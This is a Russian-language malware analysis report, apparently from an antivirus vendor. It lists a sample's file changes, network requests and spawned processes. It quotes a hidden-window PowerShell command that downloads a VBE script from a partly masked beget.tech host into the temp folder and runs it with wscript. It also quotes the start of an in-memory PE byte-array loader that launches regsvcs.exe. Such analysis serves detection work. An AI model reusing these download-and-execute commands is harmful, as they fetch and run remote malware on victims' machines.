Техническая информация
Вредоносные функции
Загружает
- http://ko####uh.beget.tech/registry.txt as %userprofile + %\appdata\local\temp\registry.vbe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\registry.vbe
Сетевая активность
TCP
Запросы HTTP GET
- http://ko####uh.beget.tech/Registry.txt
UDP
- DNS ASK ko####uh.beget.tech
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' %TEMP%\Registry.vbe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object Net.WebClient).DownloadFile('http://ko####uh.beget.tech/Registry.txt', $env:UserProfile + '\AppData\Local\Temp\Registry.vbe');& '<SYSTEM32>\wscript.exe' %TEMP%\Registry.vbe' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [Byte[]] $cStQlbmXJRK = 0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [Byte[]] $cStQlbmXJRK = 0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'
